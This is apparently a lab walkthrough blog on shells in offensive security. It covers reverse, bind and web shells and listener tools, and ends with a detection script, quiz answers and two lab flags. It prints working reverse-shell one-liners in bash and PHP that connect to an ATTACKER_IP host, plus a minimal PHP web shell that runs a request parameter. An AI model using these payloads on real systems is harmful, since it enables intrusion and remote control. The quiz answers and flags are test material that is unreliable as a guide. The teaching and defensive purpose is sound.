🐚 Shells in Offensive Security – Complete Overview & Practical Walkthrough


Shells play a crucial role in offensive security. Whether you're performing penetration testing or analyzing attacker behavior, understanding shells helps you both exploit and defend systems effectively.

In this blog, we’ll cover:

  • What a shell is

  • Reverse Shells

  • Bind Shells

  • Shell Listeners

  • Shell Payloads

  • Web Shells

  • Practical Lab Flags

  • ✅ All Answers (Before Conclusion)


🔹 What is a Shell?

A shell is a program that allows users to interact with an operating system. In cybersecurity, it usually refers to a command-line session an attacker gains on a compromised system.

With shell access, attackers can:

  • Execute commands remotely

  • Perform Privilege Escalation

  • Exfiltrate sensitive data

  • Maintain persistence

  • Pivot to other machines in the network


🔄 Reverse Shell

A Reverse Shell (connect-back shell) is one in which the target system initiates a connection back to the attacker’s machine.

How It Works

  1. Attacker sets up a listener (listen, verbose, no DNS resolution, port 443):

    nc -lvnp 443

  2. Target executes the reverse shell payload.

  3. Target connects back to the attacker.

  4. Attacker gains remote shell access.

Why Reverse Shells Are Popular

  • Bypass firewall restrictions (outbound traffic is often allowed while inbound connections are blocked)

  • Blend with legitimate traffic (ports like 80 and 443 look like ordinary web traffic)


🔗 Bind Shell

A Bind Shell binds a port on the compromised system and waits for the attacker to connect to it.

How It Works

  1. Target opens a listening port (e.g., 8080) attached to a shell.

  2. Attacker connects using:

    nc -nv TARGET_IP 8080

  3. The shell is exposed over that connection.

⚠ Binding to ports below 1024 requires root privileges on Unix-like systems.


🎧 Shell Listeners

Netcat isn’t the only listener tool available.

1️⃣ rlwrap

Wraps Netcat with readline features: command history and arrow-key line editing.

rlwrap nc -lvnp 443

2️⃣ ncat

Improved Netcat from the Nmap project.

ncat -lvnp 4444
ncat --ssl -lvnp 4444

The --ssl flag wraps the listener in TLS, so the shell traffic is encrypted on the wire instead of passing as plaintext.

3️⃣ socat

A flexible socket relay utility; the two -d flags increase verbosity so connection events are shown.

socat -d -d TCP-LISTEN:443 STDOUT

💣 Shell Payloads

Shell payloads are the commands or scripts run on the target to expose a bind shell or connect a reverse shell; they exist for most scripting languages found on a host.

🟢 Bash Reverse Shell

Uses bash's built-in /dev/tcp pseudo-device: the interactive shell's stdout and stderr are redirected to the socket and its stdin is read from it.

bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1

🟣 PHP Reverse Shell

PHP can execute commands through any of:

  • exec()

  • shell_exec()

  • system()

  • passthru()

  • popen()

Example:

php -r '$sock=fsockopen("ATTACKER_IP",443);exec("sh <&3 >&3 2>&3");'

🔵 Python Reverse Shell

Uses the socket module for the connection and subprocess to spawn the shell:

import socket,subprocess,os

🌐 Web Shell

A Web Shell is a malicious script uploaded to a vulnerable web server that allows command execution through a browser, typically by passing a command as a request parameter.

Example PHP Web Shell

<?php
// Deliberately vulnerable: the cmd parameter is passed straight to system()
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

Accessed as:

http://victim.com/shell.php?cmd=whoami

Common Web Shells

  • p0wny-shell

  • b374k shell

  • c99 shell

Common Vulnerability Used

  • Unrestricted File Upload
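A defender-side check for the pattern above, added here as an example that is not part of the original post: a small Python scanner that flags PHP source where request data ($_GET and friends) reaches one of the command-execution functions this page lists. The sink and source names are assumptions kept to what the page discusses; the two PHP samples are constructed inputs.

```python
import re

# Command-execution sinks named on the page (exec, shell_exec, system,
# passthru, popen). Assumed: request superglobals are the taint sources.
SINKS = ("exec", "shell_exec", "system", "passthru", "popen")
SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE", "$_SERVER")

# \b keeps "exec(" from also matching inside "shell_exec(".
_SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(", re.IGNORECASE)


def scan_php_source(source: str) -> list[dict]:
    """Return one finding per line where a request superglobal appears in
    the argument list of a command-execution sink."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        # Skip PHP comment lines so commented-out code does not alert.
        if line.lstrip().startswith(("//", "#", "*")):
            continue
        for m in _SINK_RE.finditer(line):
            call_text = line[m.end():]
            sources = [s for s in SOURCES if s in call_text]
            if sources:
                findings.append({"line": lineno,
                                 "sink": m.group(1).lower(),
                                 "sources": sources})
    return findings


# Constructed sample: the minimal web shell shown on this page.
WEB_SHELL = """<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>"""

# Constructed sample: an ordinary upload handler that calls no command sink.
BENIGN_UPLOAD = """<?php
$target = 'uploads/' . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $target);
echo "Saved " . htmlspecialchars($target);
?>"""

if __name__ == "__main__":
    for name, src in (("shell.php", WEB_SHELL), ("upload.php", BENIGN_UPLOAD)):
        print(name, scan_php_source(src) or "clean")
```

Run it over the web root after an upload feature is added, or as a pre-deploy check on PHP files; it is a signature check, so obfuscated shells (base64, variable functions) need a different approach.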


✅ All Answers (Before Conclusion)

Shell Overview

  • Command-line interface that allows interaction → Shell

  • Using compromised system to attack others → Pivoting

  • Escalating privileges activity → Privilege Escalation


Reverse Shell

  • Type of shell that connects back → Reverse Shell

  • Tool used to set up listener → Netcat


Bind Shell

  • Shell that opens port on target → Bind Shell

  • Ports below this number require root → 1024


Shell Listeners

  • Flexible networking tool → socat

  • Tool providing readline features → rlwrap

  • Improved Netcat version → ncat


Shell Payloads

  • Python module used → subprocess

  • Language using exec/system/popen → PHP

  • Language using exported env variables → Python


Web Shell

  • Vulnerability allowing malicious file upload → Unrestricted File Upload

  • Malicious uploaded script → Web Shell


Practical Task Flags

  • Command Injection Flag:

    THM{0f28b3e1b00becf15d01a1151baf10fd713bc625}

  • Web Upload Flag:

    THM{202bb14ed12120b31300cfbbbdd35998786b44e5}

🎯 Conclusion

Understanding shells is fundamental in offensive security. Reverse shells, bind shells, web shells, and payload techniques form a critical part of the attack chain. Mastering how they work helps you:

  • Perform penetration testing effectively

  • Detect attacker activity

  • Secure systems against exploitation

Shell knowledge is not just about attacking — it’s about understanding how attackers think and strengthening defense strategies.
